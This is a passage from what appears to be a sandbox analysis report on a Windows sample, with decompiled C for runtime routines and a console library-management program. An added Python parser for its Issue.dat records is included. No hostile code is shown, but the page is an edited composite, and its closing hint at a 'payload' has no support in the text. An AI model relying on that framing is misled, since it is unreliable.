                                                  							_t210 =  &_v22;
                                                  							if(_v22 == _t185) {
                                                  								goto L32;
                                                  							}
                                                  							_t187 = _v48;
                                                  							while(1) {
                                                  								_t172 = _t210[1];
                                                  								if(_t172 == 0) {
                                                  									break;
                                                  								}
                                                  								_t205 =  *_t210 & 0x000000ff;
                                                  								if(_t205 > (_t172 & 0x000000ff)) {
                                                  									L30:
                                                  									_t210 =  &(_t210[2]);
                                                  									if( *_t210 != 0) {
                                                  										continue;
                                                  									}
                                                  									break;
                                                  								}
                                                  								_v64 = _t228 + _t205;
                                                  								_t225 = _v64;
                                                  								_t177 = _t215 + 0x100 + _t205 * 2;
                                                  								_v72 = _t187 - _t228;
                                                  								_t189 = _t177;
                                                  								_t233 = _v72;
                                                  								_v68 = _t177;
                                                  								do {
                                                  									 *_t189 = 0x8000;
                                                  									_t189 = _t189 + 2;
                                                  									 *(_t233 + _t225) = _t205;
                                                  									 *_t225 = _t205;
                                                  									_t205 = _t205 + 1;
                                                  									_t225 =  &(_t225[0]);
                                                  								} while (_t205 <= (_t210[1] & 0x000000ff));
                                                  								_t215 = _v32;
                                                  								_t228 = _v52;
                                                  								_t187 = _v48;
                                                  								goto L30;
                                                  							}
                                                  							_t185 = 0;
                                                  							goto L32;
                                                  						}
                                                  						_t206 =  &_v22;
                                                  						if(_v22 == _t185) {
                                                  							goto L19;
                                                  						} else {
                                                  							goto L14;
                                                  						}
                                                  						while(1) {
                                                  							L14:
                                                  							_t180 = _t206[1];
                                                  							if(_t180 == 0) {
                                                  								goto L19;
                                                  							}
                                                  							_t211 =  *_t206 & 0x000000ff;
                                                  							_t181 = _t180 & 0x000000ff;
                                                  							while(_t211 <= _t181) {
                                                  								 *((char*)(_t211 + _t214)) = 0x20;
                                                  								_t211 = _t211 + 1;
                                                  								__eflags = _t211;
                                                  								_t181 = _t206[1] & 0x000000ff;
                                                  							}
                                                  							_t206 =  &(_t206[2]);
                                                  							_t257 =  *_t206 - _t185;
                                                  							if( *_t206 != _t185) {
                                                  								continue;
                                                  							}
                                                  							goto L19;
                                                  						}
                                                  						goto L19;
                                                  					}
                                                  				}
                                                  				_t183 = E00B0F5EC(__edx,  &_v92, 0, _t190, 0x1004, _t117);
                                                  				_t236 = _t235 + 0x14;
                                                  				if(_t183 != 0) {
                                                  					goto L36;
                                                  				}
                                                  				goto L3;
                                                  			}

                                                  APIs
                                                  • _free.LIBCMT ref: 00B03AB6
                                                  • _free.LIBCMT ref: 00B03ACC
                                                  • _free.LIBCMT ref: 00B03ADD
                                                  • _free.LIBCMT ref: 00B03AEE
                                                  • _free.LIBCMT ref: 00B03B05
                                                  • GetCPInfo.KERNEL32(?,?), ref: 00B03B4D
                                                    • Part of subcall function 00B0F5EC: _free.LIBCMT ref: 00B0F657
                                                  • _free.LIBCMT ref: 00B03D24
                                                  • _free.LIBCMT ref: 00B03D37
                                                  • _free.LIBCMT ref: 00B03D45
                                                  • _free.LIBCMT ref: 00B03D50
                                                  • _free.LIBCMT ref: 00B03D92
                                                  • _free.LIBCMT ref: 00B03D9A
                                                  • _free.LIBCMT ref: 00B03DA2
                                                  • _free.LIBCMT ref: 00B03DAA
                                                  • _free.LIBCMT ref: 00B03DB8
                                                    • Part of subcall function 00B04B10: MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00B027F4,00000000,00000000,00000001,00000020,00000100,?,5EFC4D8B), ref: 00B04B58
                                                    • Part of subcall function 00B04B10: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 00B04BCD
                                                    • Part of subcall function 00B04B10: GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00B04BDF
                                                    • Part of subcall function 00B04B10: __freea.LIBCMT ref: 00B04BE8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free$ByteCharMultiWide$InfoStringType__freea
                                                  • String ID:
                                                  • API String ID: 607174680-0
                                                  • Opcode ID: cb1329a35e1bafde06a3fc047f79ff489eeac4a7c45b7a31965b8b201dd33607
                                                  • Instruction ID: 7decbde11547f21c54bc8275ae16357db5535ef8ecb276ca7bbf607a8d30f491
                                                  • Opcode Fuzzy Hash: cb1329a35e1bafde06a3fc047f79ff489eeac4a7c45b7a31965b8b201dd33607
                                                  • Instruction Fuzzy Hash: EEC1BF709002099FDB21DFA8C885BFEBBF9FF48700F1444ADF599A7292D775A9418B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 63%
                                                  			E00AFEBBC(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, char* _a8, signed int _a12, intOrPtr _a16) {
                                                  				void* _v0;
                                                  				signed int _v8;
                                                  				void* _v12;
                                                  				void* _v16;
                                                  				void* _v17;
                                                  				void* _v18;
                                                  				void* _v20;
                                                  				void* _v22;
                                                  				void* _v24;
                                                  				void* _v25;
                                                  				void* _v28;
                                                  				void* _v32;
                                                  				void* _v34;
                                                  				intOrPtr _v36;
                                                  				signed int _v40;
                                                  				signed int* _v44;
                                                  				signed int _v48;
                                                  				void* _v52;
                                                  				void* _v56;
                                                  				void* _v60;
                                                  				void* _v64;
                                                  				void* _v68;
                                                  				void* _v72;
                                                  				void* _v88;
                                                  				void* _v124;
                                                  				void* _v128;
                                                  				void* _v156;
                                                  				void* _v160;
                                                  				void* _v164;
                                                  				signed int _t90;
                                                  				char* _t96;
                                                  				signed int* _t97;
                                                  				signed int* _t99;
                                                  				char* _t190;
                                                  				signed int _t197;
                                                  				intOrPtr _t270;
                                                  				void* _t272;
                                                  				signed int _t281;
                                                  				signed int _t283;
                                                  				signed int _t288;
                                                  				void* _t291;
                                                  				void* _t292;
                                                  
                                                  				_t90 =  *0xb26018; // 0xb47fd95f
                                                  				_v8 = _t90 ^ _t288;
                                                  				_push(__ebx);
                                                  				_t190 = _a8;
                                                  				_push(__esi);
                                                  				_t281 = _a12;
                                                  				_v40 = _t281;
                                                  				_push(__edi);
                                                  				_t270 = _a16;
                                                  				_v36 = _t270;
                                                  				if(_t190 != 0) {
                                                  					if( *_t190 == 0 || _t281 == 0) {
                                                  						goto L1;
                                                  					} else {
                                                  						_t96 =  *_t281;
                                                  						if(_t96 == 0 ||  *_t96 == 0) {
                                                  							goto L1;
                                                  						} else {
                                                  							_t97 = E00AF69E3();
                                                  							_push(_t270);
                                                  							_push(_t281);
                                                  							 *_t97 =  *_t97 & 0x00000000;
                                                  							_v44 = _t97;
                                                  							_v48 =  *_t97;
                                                  							_t272 = L00AFEB59(_t190, _t270, _t281, _a4, _t190);
                                                  							_t283 = _t281 | 0xffffffff;
                                                  							_t292 = _t291 + 0x10;
                                                  							if(_t272 != _t283 ||  *((intOrPtr*)(E00AF69E3())) == 2 && E00B17780(_t190, 0x5c) == 0 && E00B17780(_t190, 0x2f) == 0 &&  *((char*)(_t190 + 1)) != 0x3a) {
                                                  								L48:
                                                  								_t99 = _v44;
                                                  								if( *_t99 == 0) {
                                                  									_t197 = _v48;
                                                  									if(_t197 != 0) {
                                                  										 *_t99 = _t197;
                                                  									}
                                                  								}
                                                  								goto L52;
                                                  							} else {
                                                  								goto L48;
                                                  							}
                                                  						}
                                                  					}
                                                  				} else {
                                                  					L1:
                                                  					 *((intOrPtr*)(E00AF69E3())) = 0x16;
                                                  					E00AF68BC();
                                                  					L52:
                                                  					return L00AD1DCD(_v8 ^ _t288);
                                                  				}
                                                  			}
                                                  Disassembly listing for this function (instruction addresses 0x00afebc4 to 0x00afee4d): only the address column survived extraction; the decompiled C above and the API references below carry the content.

                                                  APIs
                                                  • ___from_strstr_to_strchr.LIBCMT ref: 00AFEC48
                                                  • ___from_strstr_to_strchr.LIBCMT ref: 00AFEC56
                                                    • Part of subcall function 00AF68E9: IsProcessorFeaturePresent.KERNEL32(00000017,00AF68BB,?,?,?,?,?,?,?,?,00AF68C8,00000000,00000000,00000000,00000000,00000000), ref: 00AF68EB
                                                    • Part of subcall function 00AF68E9: GetCurrentProcess.KERNEL32(C0000417), ref: 00AF690E
                                                    • Part of subcall function 00AF68E9: TerminateProcess.KERNEL32(00000000), ref: 00AF6915
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Process___from_strstr_to_strchr$CurrentFeaturePresentProcessorTerminate
                                                  • String ID: PATH$\
                                                  • API String ID: 2025418227-1896636505
                                                  • Opcode ID: 02625dac792371b21abbdcfbd6b2612f01e9bccc94bbdf5ef28cf86a26280e93
                                                  • Instruction ID: 37202443ecdce80739d4d1e163031662cea40572d7e98d40bd2a12f99fa95a6f
                                                  • Opcode Fuzzy Hash: 02625dac792371b21abbdcfbd6b2612f01e9bccc94bbdf5ef28cf86a26280e93
                                                  • Instruction Fuzzy Hash: 85713631904209AFEF36DBE4DC42BFE7BA59F45320F240199F650AB1E2DB758D81C6A0
                                                  Uniqueness
                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 57%
                                                  			E00B19252(intOrPtr* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                                                  				void* _t4;
                                                  				void* _t10;
                                                  				void* _t14;
                                                  				void* _t17;
                                                  				void* _t23;
                                                  				intOrPtr _t26;
                                                  				void* _t27;
                                                  				void* _t29;
                                                  				intOrPtr* _t34;
                                                  				void* _t36;
                                                  				void* _t38;
                                                  				intOrPtr* _t40;
                                                  				void* _t42;
                                                  				void* _t44;
                                                  				void* _t46;
                                                  				void* _t47;
                                                  				void* _t50;
                                                  
                                                  				_t40 = __esi;
                                                  				_t38 = __edi;
                                                  				_t37 = __edx;
                                                  				_t36 = __ecx;
                                                  				_t34 = __ebx;
                                                  				_push("cls");
                                                  				E00AE3965(__ebx, __edx, __edi, __esi);
                                                  				0xb27e6c->X = 0x6000a;
                                                  				_push(0xb27e6c->X);
                                                  				_push(0xfffffff5);
                                                  				_t4 =  *__ebx();
                                                  				 *__esi();
                                                  				E00AD1080(_t36, "Enter Book ID:", _t4);
                                                  				_t46 = _t44 + 8;
                                                  				do {
                                                  					E00AD10F0(_t36, 0xb22be0, _t42 - 8);
                                                  					 *0xb27f2c = L00AD9D57("Issue.dat", "rb");
                                                  					_t10 = E00AF1525(0xb27ec0, 0x6c, 1, _t9);
                                                  					_t47 = _t46 + 0x20;
                                                  					if(_t10 == 1) {
                                                  						do {
                                                  							_t26 =  *0xb27ec0; // 0x0
                                                  							_t55 = _t26 -  *((intOrPtr*)(_t42 - 8));
                                                  							if(_t26 ==  *((intOrPtr*)(_t42 - 8))) {
                                                  								E00B17A40(_t37);
                                                  								0xb27e6c->X = 0xc000a;
                                                  								_t29 =  *_t34(0xfffffff5, 0xb27e6c->X);
                                                  								 *_t40();
                                                  								E00AD1080(_t36, "Press any key.......", _t29);
                                                  								_t47 = _t47 + 4;
                                                  								E00AF4817(_t37, _t40, _t55);
                                                  								E00B17A40(_t37);
                                                  								_t38 = 1;
                                                  							}
                                                  							_t27 = E00AF1525(0xb27ec0, 0x6c, 1,  *0xb27f2c);
                                                  							_t47 = _t47 + 0x10;
                                                  							_t56 = _t27 - 1;
                                                  						} while (_t27 == 1);
                                                  					}
                                                  					E00ADA436(_t36, _t37, L00AD9E7D(0));
                                                  					_push( *0xb27f2c);
                                                  					E00ADA516(_t36, _t37, _t56);
                                                  					_t50 = _t47 + 0xc;
                                                  					_t57 = _t38;
                                                  					if(_t38 == 0) {
                                                  						0xb27e6c->X = 0x8000a;
                                                  						_t23 =  *_t34(0xfffffff5, 0xb27e6c->X);
                                                  						 *_t40();
                                                  						E00AD1080(_t36, "No Record Found", _t23);
                                                  						_t50 = _t50 + 4;
                                                  					}
                                                  					0xb27e6c->X = 0xd000a;
                                                  					_t14 =  *_t34(0xfffffff5, 0xb27e6c->X);
                                                  					 *_t40();
                                                  					E00AD1080(_t36, "Try Another Search?(Y/N)", _t14);
                                                  					_t46 = _t50 + 4;
                                                  					_t17 = E00AF4817(_t37, _t40, _t57);
                                                  					_t58 = _t17 - 0x79;
                                                  				} while (_t17 == 0x79);
                                                  				0xb27e6c->X = 0x1e0001;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
                                                  				_push(" Press ENTER to return to main menu");
                                                  				E00AD1080(_t36);
                                                  				do {
                                                  				} while (E00AF4817(_t37, _t40, _t58) != 0xd);
                                                  				return E00B1A4D0(_t34, _t36, _t37, _t38, _t40);
                                                  			}
                                                  Disassembly listing for E00B19252 (instruction addresses 0x00b19252 to 0x00b19635): only the address column survived extraction; the decompiled C above and the API references below carry the content.

                                                  APIs
                                                  • __fread_nolock.LIBCMT ref: 00B192AF
                                                  • __fread_nolock.LIBCMT ref: 00B19311
                                                    • Part of subcall function 00B17A40: GetStdHandle.KERNEL32(000000F5), ref: 00B17A68
                                                    • Part of subcall function 00B17A40: SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17A71
                                                    • Part of subcall function 00B17A40: GetStdHandle.KERNEL32(000000F5), ref: 00B17A97
                                                    • Part of subcall function 00B17A40: SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17A9A
                                                    • Part of subcall function 00B17A40: GetStdHandle.KERNEL32(000000F5), ref: 00B17ACD
                                                    • Part of subcall function 00B17A40: SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17AD0
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1960A
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1960D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition$__fread_nolock
                                                  • String ID: Press ENTER to return to main menu$Enter Book ID:$Issue.dat$No Record Found$Press any key.......$Try Another Search?(Y/N)$cls
                                                  • API String ID: 2024444707-225778198
                                                  • Opcode ID: 7896f87af7c9d2230f11537cf7fa58e393baf39b67567fce1571be6f89f66e9c
                                                  • Instruction ID: 0b153d82976558ece10cb9839be44b5890e6e96f41972190e2c143441b26e358
                                                  • Opcode Fuzzy Hash: 7896f87af7c9d2230f11537cf7fa58e393baf39b67567fce1571be6f89f66e9c
                                                  • Instruction Fuzzy Hash: 1E318BB2CC829076DA3077E0BC47EAA3999DB14764F1041D1F11A523F2DEB299908B77
                                                  Uniqueness
                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 52%
                                                  			E00B17A40(void* __edx) {
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t11;
                                                  				void* _t12;
                                                  				void* _t14;
                                                  				void* _t16;
                                                  
                                                  				_push("cls");
                                                  				E00AE3965(_t11, __edx, _t14, _t16);
                                                  				0xb27e6c->X = 0x8000a;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t12, "The Book has taken by Mr. %s", 0xb27ec4);
                                                  				0xb27e6c->X = 0x9000a;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				_push( *0xb27f1c);
                                                  				_push( *0xb27f14);
                                                  				E00AD1080(_t12, "Issued Date:%d-%d-%d",  *0xb27f18);
                                                  				0xb27e6c->X = 0xa000a;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
                                                  				_push( *0xb27f28);
                                                  				_push( *0xb27f20);
                                                  				return E00AD1080(_t12, "Returning Date:%d-%d-%d",  *0xb27f24);
                                                  			}
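The two routines above together define the on-disk record format of the console program bundled in this sample: E00B19252 reads Issue.dat in 0x6c-byte (108-byte) records into the static buffer at 0xb27ec0 and compares the leading integer of each record with the entered Book ID, and E00B17A40 prints the borrower string at 0xb27ec4 plus two three-integer dates starting at 0xb27f14 and 0xb27f20. The Python below is an added reconstruction of that layout and search loop, written for this page and not taken from the sample or from the sandbox output. Its assumptions are labelled in the code: the 80 bytes between offsets +0x04 and +0x54 are treated as one NUL-terminated name field (the page only shows that a string starts at +0x04 and that the next field read is at +0x54), each date is printed in ascending address order (the decompiler's argument ordering for those printf calls is ambiguous), and the Issue.dat content is constructed sample data. Like the original, the reader stops at the first short fread and reports every matching record rather than only the first.

```python
import struct
from typing import Iterator, List

# Record layout of Issue.dat, reconstructed from E00B19252 (reader) and
# E00B17A40 (printer) on this page.  fread(buf, 0x6c, 1, fp) fills the static
# buffer at 0xb27ec0 with one 108-byte record; the fields the code touches are:
#   +0x00  int32     book id         (0xb27ec0, compared with the entered ID)
#   +0x04  char[]    borrower name   (0xb27ec4, printed with "%s")
#   +0x54  int32 x3  issued date     (0xb27f14, 0xb27f18, 0xb27f1c)
#   +0x60  int32 x3  returning date  (0xb27f20, 0xb27f24, 0xb27f28)
# ASSUMPTION: the 80 bytes from +0x04 to +0x54 form one NUL-terminated name
# field, and each date is printed in ascending address order.
RECORD_SIZE = 0x6C
RECORD_FMT = "<i80s6i"  # little-endian: int32, 80 raw bytes, six int32
assert struct.calcsize(RECORD_FMT) == RECORD_SIZE


def parse_record(raw: bytes) -> dict:
    """Unpack one 108-byte record into a dict of named fields."""
    if len(raw) != RECORD_SIZE:
        raise ValueError(f"record must be {RECORD_SIZE} bytes, got {len(raw)}")
    book_id, name, *dates = struct.unpack(RECORD_FMT, raw)
    return {
        "book_id": book_id,
        "borrower": name.split(b"\0", 1)[0].decode("ascii", "replace"),
        "issued": tuple(dates[0:3]),
        "returning": tuple(dates[3:6]),
    }


def iter_records(data: bytes) -> Iterator[dict]:
    """Mirror the `fread(...) == 1` loop: yield whole records, stop at a short read."""
    for off in range(0, len(data) - RECORD_SIZE + 1, RECORD_SIZE):
        yield parse_record(data[off:off + RECORD_SIZE])


def find_issues(data: bytes, book_id: int) -> List[dict]:
    """Search as E00B19252 does: every record whose leading int32 equals book_id.

    An empty list corresponds to the original's "No Record Found" branch.
    """
    return [rec for rec in iter_records(data) if rec["book_id"] == book_id]


def format_issue(rec: dict) -> str:
    """Render a hit the way E00B17A40 prints it (date field order assumed, see above)."""
    d, r = rec["issued"], rec["returning"]
    return (
        f"The Book has taken by Mr. {rec['borrower']}\n"
        f"Issued Date:{d[0]}-{d[1]}-{d[2]}\n"
        f"Returning Date:{r[0]}-{r[1]}-{r[2]}"
    )


def make_record(book_id: int, borrower: str, issued, returning) -> bytes:
    """Build one record in the same layout; used here only to construct sample data."""
    return struct.pack(RECORD_FMT, book_id, borrower.encode("ascii"), *issued, *returning)


# Constructed sample Issue.dat (not from the sample): two whole records plus a
# trailing partial record, which the reader ignores just as the fread loop does.
SAMPLE_ISSUE_DAT = (
    make_record(7, "Alice", (1, 2, 2020), (15, 2, 2020))
    + make_record(12, "Bob", (3, 4, 2021), (17, 4, 2021))
    + b"\0" * 10
)

if __name__ == "__main__":
    hits = find_issues(SAMPLE_ISSUE_DAT, 12)
    print("\n\n".join(format_issue(h) for h in hits) if hits else "No Record Found")
```

Run against a real Issue.dat dropped beside the executable, the same parser lets an analyst confirm whether the file the native stub reads is the benign library data the strings suggest or something the payload has repurposed; a record whose name field is not printable ASCII, or a file whose length is not a multiple of 108, is the first thing to look at.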
                                                  Disassembly listing for E00B17A40 (instruction addresses 0x00b17a43 to 0x00b17af4): only the address column survived extraction; the decompiled C above and the API references below carry the content.

                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17A68
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17A71
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17A97
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17A9A
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B17ACD
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17AD0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition
                                                  • String ID: Issued Date:%d-%d-%d$Returning Date:%d-%d-%d$The Book has taken by Mr. %s$cls
                                                  • API String ID: 4283984680-2668252268
                                                  • Opcode ID: a88f10b91b334bd022ce5a917a3a4ad3b98dc374bf0f7bd3bab4e1b4169ac80c
                                                  • Instruction ID: 134c7d23e65eb25f9df790fbacddc9c3dc24c4e382c5d35acf17155643cc5a1d
                                                  • Opcode Fuzzy Hash: a88f10b91b334bd022ce5a917a3a4ad3b98dc374bf0f7bd3bab4e1b4169ac80c
                                                  • Instruction Fuzzy Hash: 5601D4B398C1907ACB317BD6FD09D863E69EB4D7247054181F128032B1CEB15422DF75
                                                  Uniqueness
                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E00AFC483(void* __edx, void* __esi, char _a4) {
                                                  				void* _v5;
                                                  				char _v12;
                                                  				char _v16;
                                                  				char _v20;
                                                  				void* __ebp;
                                                  				char _t55;
                                                  				char _t61;
                                                  				intOrPtr _t67;
                                                  				void* _t71;
                                                  				void* _t72;
                                                  
                                                  				_t72 = __esi;
                                                  				_t71 = __edx;
                                                  				_t36 = _a4;
                                                  				_t67 =  *_a4;
                                                  				_t76 = _t67 - 0xb1ce30;
                                                  				if(_t67 != 0xb1ce30) {
                                                  					L00AF4D62(_t67);
                                                  					_t36 = _a4;
                                                  				}
                                                  				L00AF4D62( *((intOrPtr*)(_t36 + 0x3c)));
                                                  				L00AF4D62( *((intOrPtr*)(_a4 + 0x30)));
                                                  				L00AF4D62( *((intOrPtr*)(_a4 + 0x34)));
                                                  				L00AF4D62( *((intOrPtr*)(_a4 + 0x38)));
                                                  				L00AF4D62( *((intOrPtr*)(_a4 + 0x28)));
                                                  				L00AF4D62( *((intOrPtr*)(_a4 + 0x2c)));
                                                  				L00AF4D62( *((intOrPtr*)(_a4 + 0x40)));
                                                  				L00AF4D62( *((intOrPtr*)(_a4 + 0x44)));
                                                  				L00AF4D62( *((intOrPtr*)(_a4 + 0x360)));
                                                  				_v16 =  &_a4;
                                                  				_t55 = 5;
                                                  				_v12 = _t55;
                                                  				_v20 = _t55;
                                                  				_push( &_v12);
                                                  				_push( &_v16);
                                                  				_push( &_v20);
                                                  				E00AFC1AB(_t71, _t76);
                                                  				_v16 =  &_a4;
                                                  				_t61 = 4;
                                                  				_v20 = _t61;
                                                  				_v12 = _t61;
                                                  				_push( &_v20);
                                                  				_push( &_v16);
                                                  				_push( &_v12);
                                                  				return E00AFC20C(_t71, _t72, _t76);
                                                  			}
                                                  Disassembly listing for E00AFC483 (instruction addresses 0x00afc483 to 0x00afc551): only the address column survived extraction; the decompiled C above carries the content.

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
• Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
• Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
• Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: ca4dd42af2d3cbc6a8bba9c04723d8a46d06bfc4913c422eeca9421cc01ae2cd
                                                  • Instruction ID: 767269be5e68962d9105abf87253dc3938006037e8fd357576ba814465cf29fe
                                                  • Opcode Fuzzy Hash: ca4dd42af2d3cbc6a8bba9c04723d8a46d06bfc4913c422eeca9421cc01ae2cd
                                                  • Instruction Fuzzy Hash: 7021747690010CEFDF51EFD5C981DEE7BB9BF48750F0081A6B6199B121EB35EA548B80
Uniqueness
• Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E00B014C0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int* _a8) {
                                                  				signed int _v0;
                                                  				intOrPtr _v4;
                                                  				signed int _v6;
                                                  				char _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				short _v18;
                                                  				void* _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				signed int _v32;
                                                  				signed int _v36;
                                                  				void* _v44;
                                                  				intOrPtr _v48;
                                                  				char _v52;
                                                  				intOrPtr _v56;
                                                  				intOrPtr _v60;
                                                  				intOrPtr* _v68;
                                                  				signed int _v72;
                                                  				signed int _v84;
                                                  				intOrPtr* _v112;
                                                  				intOrPtr* _v160;
                                                  				intOrPtr* _v200;
                                                  				intOrPtr _v232;
                                                  				intOrPtr* _v236;
                                                  				CHAR* _v240;
                                                  				signed int _v252;
                                                  				intOrPtr _v298;
                                                  				intOrPtr _v299;
                                                  				struct _WIN32_FIND_DATAA _v344;
                                                  				union _FINDEX_INFO_LEVELS _v348;
                                                  				signed int _v352;
                                                  				signed int _v356;
                                                  				intOrPtr _v576;
                                                  				intOrPtr* _t186;
                                                  				signed int _t188;
                                                  				signed int _t193;
                                                  				void* _t194;
                                                  				signed int _t204;
                                                  				intOrPtr _t206;
                                                  				char _t207;
                                                  				void* _t211;
                                                  				signed int _t213;
                                                  				intOrPtr* _t215;
                                                  				signed int _t217;
                                                  				signed int _t222;
                                                  				signed int _t223;
                                                  				intOrPtr* _t234;
                                                  				intOrPtr _t236;
                                                  				signed int _t237;
                                                  				void* _t240;
                                                  				intOrPtr _t242;
                                                  				void* _t247;
                                                  				intOrPtr _t249;
                                                  				void* _t254;
                                                  				signed int _t257;
                                                  				intOrPtr _t259;
                                                  				signed char _t260;
                                                  				union _FINDEX_INFO_LEVELS _t268;
                                                  				int _t273;
                                                  				void* _t285;
                                                  				void* _t287;
                                                  				signed int _t288;
                                                  				signed int _t291;
                                                  				void* _t293;
                                                  				signed int _t294;
                                                  				signed int _t295;
                                                  				intOrPtr _t297;
                                                  				short _t302;
                                                  				short _t303;
                                                  				void* _t306;
                                                  				signed int _t307;
                                                  				signed int* _t308;
                                                  				char _t310;
                                                  				void* _t311;
                                                  				intOrPtr _t313;
                                                  				signed int _t319;
                                                  				signed int* _t320;
                                                  				signed int _t323;
                                                  				signed int _t325;
                                                  				signed int _t327;
                                                  				void* _t329;
                                                  				void* _t332;
                                                  				intOrPtr _t333;
                                                  				union _FINDEX_INFO_LEVELS _t334;
                                                  				void* _t337;
                                                  				signed int* _t339;
                                                  				signed int _t341;
                                                  				signed int _t343;
                                                  				signed int _t345;
                                                  				intOrPtr _t348;
                                                  				signed int _t349;
                                                  				signed int _t351;
                                                  				intOrPtr* _t358;
                                                  				signed int _t363;
                                                  				intOrPtr* _t364;
                                                  				signed int _t366;
                                                  				void* _t368;
                                                  				intOrPtr* _t369;
                                                  				char _t372;
                                                  				void* _t374;
                                                  				intOrPtr* _t375;
                                                  				intOrPtr _t383;
                                                  				intOrPtr* _t395;
                                                  				signed int _t399;
                                                  				intOrPtr* _t400;
                                                  				intOrPtr* _t408;
                                                  				signed int _t413;
                                                  				void* _t414;
                                                  				void* _t415;
                                                  				intOrPtr _t416;
                                                  				signed int _t418;
                                                  				signed int _t419;
                                                  				signed int _t421;
                                                  				signed int _t423;
                                                  				signed int _t425;
                                                  				signed int _t426;
                                                  				signed int _t428;
                                                  				signed int _t430;
                                                  				CHAR* _t431;
                                                  				signed int _t433;
                                                  				signed int _t438;
                                                  				signed int _t440;
                                                  				signed int _t441;
                                                  				signed int _t442;
                                                  				signed int _t444;
                                                  				signed int _t445;
                                                  				signed int _t447;
                                                  				signed int _t448;
                                                  				intOrPtr* _t451;
                                                  				void* _t452;
                                                  				intOrPtr _t453;
                                                  				void* _t454;
                                                  				signed int _t457;
                                                  				signed int _t460;
                                                  				void* _t461;
                                                  				void* _t462;
                                                  				void* _t464;
                                                  				void* _t465;
                                                  				signed int _t466;
                                                  				void* _t467;
                                                  				void* _t468;
                                                  				void* _t469;
                                                  				signed int _t470;
                                                  				void* _t471;
                                                  				void* _t472;
                                                  
                                                  				_t186 = _a8;
                                                  				_t465 = _t464 - 0x28;
                                                  				_push(__esi);
                                                  				if(_t186 != 0) {
                                                  					_t438 = _a4;
